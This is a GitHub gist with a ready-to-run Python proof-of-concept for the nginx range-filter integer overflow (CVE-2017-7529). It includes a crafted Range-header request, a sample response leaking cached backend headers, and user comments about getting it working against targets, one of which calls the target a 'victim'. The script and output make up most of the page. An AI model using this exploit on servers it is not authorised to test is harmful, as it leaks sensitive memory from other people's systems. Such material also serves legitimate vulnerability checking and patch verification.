Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Nginx - Remote Integer Overflow Vulnerability

CVE 2017-7529

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

Make sure requests is installed

Usage

usage: python CVE_2017_7529.py [-h] url

Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529

positional arguments:
  url         URL to test

optional arguments:
  -h, --help  show this help message and exit

Requests

GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import sys
import logging
import argparse
try:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
print("Please install the requests module.")
sys.exit(1)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def send_request(url, headers=None, timeout=8):
kwargs = {"headers": headers, "timeout": timeout, "verify": False}
response = requests.get(url, **kwargs)
http_headers = response.headers
log.info("status: %s" % response.status_code)
log.info("server: %s" % http_headers.get("Server", ""))
return response
def exploit(url):
log.info("target: %s", url)
response = send_request(url)
content_length = response.headers.get("Content-Length", 0)
bytes_length = int(content_length) + 623
content_length = "bytes=-%d,-9223372036854%d" % (
bytes_length,
776000 - bytes_length,
)
response = send_request(url, headers={"Range": content_length})
if response.status_code == 206 and "Content-Range" in response.headers:
log.info("vulnerable?: Vulnerable to CVE-2017-7529")
elif response.status_code == 416:
log.warn("vulnerable?: Not Vulnerable (Range Not Satisfiable)")
else:
log.info("vulnerable?: Unknown (%s)" % response.status_code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529"
)
parser.add_argument("url", help="URL to test", type=str)
args = parser.parse_args()
url = requests.utils.urlparse(args.url)
if not url.scheme:
print(
"URL scheme specifier is missing. Please include either 'http://' or 'https://'."
)
sys.exit(1)
if not url.path:
print("URL path is missing. Please include a full path.")
sys.exit(1)
exploit(args.url)
@attacker007
Copy link

attacker007 commented Sep 9, 2019

Supposing target is abc.example.com

I am getting error while running this command

python CVE_2017_7529.py abc.example.com

Result

INFO:__main__:target: abc.example.com
Traceback (most recent call last):
  File "CVE_2017_7529.py", line 49, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 27, in exploit
    http_response = send_http_request(url)
  File "CVE_2017_7529.py", line 17, in send_http_request
    http_response = requests.get(url, headers=headers, timeout=timeout)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 

Requests already installed in mac mojave os...
I have also checked with both python and python3 ...getting same error.. plz let me know about how i can get rid of that error.

Thanks..

@thehappydinoa
Copy link
Author

thehappydinoa commented Sep 9, 2019

Hey, you need a specific url that is vulnerable, such as https://abc.example.com/image.jpg

@PvtSec
Copy link

PvtSec commented Dec 17, 2019

INFO:main:status: 200
INFO:main:server: nginx/1.14.0 (Ubuntu)
INFO:main:status: 416
INFO:main:server: nginx/1.14.0 (Ubuntu)
WARNING:main:vulnerable: Not Vulnerable (Range Not Satisfiable)

What does this mean?
And if vulnerable what should be expected?

@Mr-w4n73d
Copy link

Mr-w4n73d commented Feb 29, 2020

python CVE_2017_7529.py https://example.com/robots.txt
INFO:main:target: https://example.com/robots.txt
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:main:vulnerable: Unknown (200)

now what to do my victime has only robots.txt dir with 200 okay response

@silentbronco
Copy link

silentbronco commented Mar 12, 2020

Supposing target is abc.example.com

I am getting error while running this command

python CVE_2017_7529.py abc.example.com

Result

INFO:__main__:target: abc.example.com
Traceback (most recent call last):
  File "CVE_2017_7529.py", line 49, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 27, in exploit
    http_response = send_http_request(url)
  File "CVE_2017_7529.py", line 17, in send_http_request
    http_response = requests.get(url, headers=headers, timeout=timeout)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 

Requests already installed in mac mojave os...
I have also checked with both python and python3 ...getting same error.. plz let me know about how i can get rid of that error.

Thanks..

You are supposed to use a protocol, either https:// or http://

@im403
Copy link

im403 commented Oct 19, 2020

how to fix ssl error

Traceback (most recent call last):
File "CVE_2017_7529.py", line 49, in
exploit(args.url)
File "CVE_2017_7529.py", line 27, in exploit
http_response = send_http_request(url)
File "CVE_2017_7529.py", line 17, in send_http_request
http_response = requests.get(url, headers=headers, timeout=timeout)
File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in send
history = [resp for resp in gen]
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in
history = [resp for resp in gen]
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 245, in resolve_redirects
**adapter_kwargs
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 643, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/adapters.py", line 514, in send
raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='example.com', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

@thehappydinoa
Copy link
Author

thehappydinoa commented Oct 19, 2020

@im403 I just pushed an update to disable SSL verification.

@jacob2020baklas
Copy link

jacob2020baklas commented Jan 17, 2021

i think this would do https://stackoverflow.com/a/63750034

but im not that good at python

tested on both py2 & py3 the same error

Traceback (most recent call last):
File "CVE_2017_7529.py", line 75, in
exploit(args.url)
File "CVE_2017_7529.py", line 47, in exploit
response = send_request(url, headers={"Range": content_length})
File "CVE_2017_7529.py", line 28, in send_request
response = requests.get(url, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 542, in request
resp = self.send(prep, **send_kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 697, in send
r.content
File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 831, in content
self.content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 758, in generate
raise ContentDecodingError(e)
requests.exceptions.ContentDecodingError: ('Received response with content-encoding: gzip, but failed to decode it.', error('Error -3 while decompressing: incorrect header check',))

@suhas-s-dev
Copy link

suhas-s-dev commented May 24, 2021

Worked fine for me! Thanks!

@A1vinSmith
Copy link

A1vinSmith commented Aug 28, 2021

INFO:main:status: 200
INFO:main:server: nginx/1.14.0 (Ubuntu)
INFO:main:status: 416
INFO:main:server: nginx/1.14.0 (Ubuntu)
WARNING:main:vulnerable: Not Vulnerable (Range Not Satisfiable)

What does this mean?
And if vulnerable what should be expected?

"vulnerable?: Vulnerable to CVE-2017-7529" if it's vulnerable

@skirkyn
Copy link

skirkyn commented Mar 26, 2022

Folks! If you are using this script and getitng an error but can't look at the code and figure it out, please, start doing somethign else!
To author: thank you very much!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment